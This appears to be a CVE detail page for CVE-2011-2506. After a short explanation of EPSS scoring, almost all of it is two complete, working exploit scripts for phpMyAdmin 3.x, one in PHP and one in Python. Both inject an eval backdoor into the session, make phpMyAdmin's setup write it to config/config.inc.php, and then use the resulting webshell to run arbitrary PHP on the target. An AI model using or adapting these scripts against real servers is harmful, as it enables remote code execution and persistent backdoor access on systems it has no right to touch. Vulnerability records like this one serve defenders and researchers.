CVE-2011-2506 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

<?php /* # Exploit Title: phpMyAdmin 3.x Swekey Remote Code Injection Exploit # Date: 2011-07-09 # Author: Mango of ha.xxor.se # Version: phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 # CVE : CVE-2011-2505, CVE-2011-2506 # Advisory: http://www.xxor.se/advisories/phpMyAdmin_3.x_Multiple_Remote_Code_Executions.txt # Details: http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html */ echo php_sapi_name()!=='cli'?'<pre>':'';?> . , )\ . . ,/) , / ) , )\ )\( /)/( (__( /( / ) __ __ ________ __ __ / \ ( )| |) \ / | |\ /| | | | | | | | (__) ( ______ / | |_____( ______ | | \/ | | __ __ | |__| | ___| | __ ___________ __ __ _____ \| | \ \ | | | |)| | \ \ | | | | | | | | | | | | / / | | | | | | | | | | | | | | | |_/__/ |__| |__| | |_/__/ |__| |__| |__|__| | |__| [][]|[]__[]|[][]|_[] |_[][]|_[] [][][]__| |__| ==|__|=================|__|=========================|__|======[]====[][]=|[]|[]=[]===[]==[]=[]===[]============== phpMyAdmin < 3.3.10.2 || phpMyAdmin < 3.4.3.1 [][] [] [][] [] [] [] [] [] Remote Code Injection [] [][] [] [] [] [] [] [] http://ha.xxor.se [][] [] [] [] [][] [][] [] [] _ _ ___ __ ____ __ ___ ___ | |-| || _ |\ /\ /| _ || ) |_|-|_||_|_|/_._\/_._\|___||_|_\ ___ ___ ___ _ _ ___ ___ __ __ ( < | [_ / /| || || )(_)| |\ | / >__)|_[_ \__\|____||_|_\|_| |_| |_| Use responsibly. <?php echo php_sapi_name()!=='cli'?'</pre>':''; if(php_sapi_name()==='cli'){ if(!isset($argv[1])){ output(" Usage\n ".$argv[0]." http://example.com/phpMyAdmin-3.3.9.2"); killme(); } $pmaurl = $argv[1]; }else{ $pmaurl = isset($_REQUEST['url'])?$_REQUEST['url']:''; } $code = 'foreach($_GET as $k=>$v)if($k==="eval")eval($v);'; $cookie = null; $token = null; if(!function_exists('curl_init')){ output('[!] Fatal error. Need cURL!'); killme(); } $ch = curl_init(); $debug = 0; if(php_sapi_name()!=='cli'){ ?> <form method=post> URL: <input name=url value="<?php echo htmlspecialchars($pmaurl);?>"> Example: http://localhost:8080/phpMyAdmin-3.3.9.2<br/> <input name=submit type=submit value=♥> </form> <pre> <?php if(!isset($_REQUEST['submit']))killme(true); } output("[i] Running..."); // Start a session and get a token curl_setopt_array($ch, array( CURLOPT_URL => $pmaurl.'/setup/index.php', CURLOPT_HEADER => 1, CURLOPT_RETURNTRANSFER => 1, CURLOPT_TIMEOUT => 4, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false )); output("[*] Contacting server to retrive session cookie and token."); $result = curl_exec($ch); if(404 == curl_getinfo($ch, CURLINFO_HTTP_CODE)){ output("[!] Fail. $pmaurl/setup/index.php returned 404. The host is not vulnerable or there is a problem with the supplied url."); killme(); } if(!$result){ output("[!] cURL error:".curl_error($ch)); killme(); } if(false !== strpos($result, 'Cannot load or save configuration')){ output("[!] Fail. Host not vulnerable. Web server writable folder $pmaurl/config/ does not exsist."); killme(); } // Extract cookie preg_match('/phpMyAdmin=([^;]+)/', $result, $matches); $cookie = $matches[1]; output("[i] Cookie:".$cookie); // Extract token preg_match('/(token=|token" value=")([0-9a-f]{32})/', $result, $matches); $token = $matches[2]; output("[i] Token:".$token); // Poison _SESSION variable curl_setopt($ch, CURLOPT_URL, $pmaurl.'/?_SESSION[ConfigFile][Servers][*/'.urlencode($code).'/*][port]=0&session_to_unset=x&token='.$token); curl_setopt($ch, CURLOPT_COOKIE, 'phpMyAdmin='.$cookie); output("[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } //echo htmlspecialchars($result,ENT_QUOTES); // Save file curl_setopt($ch, CURLOPT_URL, $pmaurl.'/setup/config.php'); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, 'submit_save=Save&token='.$token); output("[*] Contacting server to make it save the injected code to a file."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } //echo htmlspecialchars($result,ENT_QUOTES); curl_setopt($ch, CURLOPT_URL, $pmaurl.'/config/config.inc.php?eval=echo%20md5(123);'); curl_setopt($ch, CURLOPT_POST, 0); output("[*] Contacting server to test if the injected code executes."); if(!$result = curl_exec($ch)){ output("[!] cURL error:".curl_error($ch)); killme(); } if(preg_match('/202cb962ac59075b964b07152d234b70/', $result)){ output("[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!"); output("[+] Use your browser to execute PHP code like this $pmaurl/config/config.inc.php?eval=echo%20'test';"); }else{ output("[!] Code injection failed. This instance of phpMyAdmin does not apear to be vulnerable."); } curl_close($ch); function output($msg){ echo php_sapi_name()!=='cli'?htmlspecialchars("$msg\n",ENT_QUOTES):"$msg\n"; flush(); } function killme(){ output("[*] Exiting..."); echo php_sapi_name()!=='cli'?'<pre>':''; die(); } echo php_sapi_name()!=='cli'?'<pre>':'';?>

#!/usr/bin/env python # coding=utf-8 # pma3 - phpMyAdmin3 remote code execute exploit # Author: wofeiwo<wofeiwo@80sec.com> # Thx Superhei # Tested on: 3.1.1, 3.2.1, 3.4.3 # CVE: CVE-2011-2505, CVE-2011-2506 # Date: 2011-07-08 # Have fun, DO *NOT* USE IT TO DO BAD THING. ################################################ # Requirements: 1. "config" directory must created&writeable in pma directory. # 2. session.auto_start = 1 in php.ini configuration. import os,sys,urllib2,re def usage(program): print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote code execute exploit" print "Usage: %s <PMA_url>" % program print "Example: %s http://www.test.com/phpMyAdmin" % program sys.exit(0) def main(args): try: if len(args) < 2: usage(args[0]) if args[1][-1] == "/": args[1] = args[1][:-1] # ��һ������ȡtoken��sessionid��sessionid��phpMyAdmin��ֵ��һ�µ� print "[+] Trying get form token&session_id.." content = urllib2.urlopen(args[1]+"/index.php").read() r1 = re.findall("token=(\w{32})", content) r2 = re.findall("phpMyAdmin=(\w{32,40})", content) if not r1: r1 = re.findall("token\" value=\"(\w{32})\"", content) if not r2: r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content) if len(r1) < 1 or len(r2) < 1: print "[-] Cannot find form token and session id...exit." sys.exit(-1) token = r1[0] sessionid = r2[0] print "[+] Token: %s , SessionID: %s" % (token, sessionid) # �ڶ�����ͨ��swekey.auth.lib.php����$_SESSION��ֵ print "[+] Trying to insert payload in $_SESSION.." uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA" url = args[1]+uri opener = urllib2.build_opener() opener.addheaders.append(('Cookie', 'phpMyAdmin=%s; pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' % (sessionid, sessionid))) urllib2.install_opener(opener) urllib2.urlopen(url) # ����setup��ȡshell print "[+] Trying get webshell.." postdata = "phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save" % (sessionid, token) url = args[1]+"/setup/config.php" # print "[+]Postdata: %s" % postdata urllib2.urlopen(url, postdata) print "[+] All done, pray for your lucky!" # ���IJ����������shell url = args[1]+"/config/config.inc.php" opener.addheaders.append(('Code', 'phpinfo();')) urllib2.install_opener(opener) print "[+] Trying connect shell: %s" % url result = re.findall("System \</td\>\<td class=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read()) if len(result) == 1: print "[+] Lucky u! System info: %s" % result[0] print "[+] Shellcode is: eval(getenv('HTTP_CODE'));" else: print "[-] Cannot get webshell." except Exception, e: print e if __name__ == "__main__" : main(sys.argv)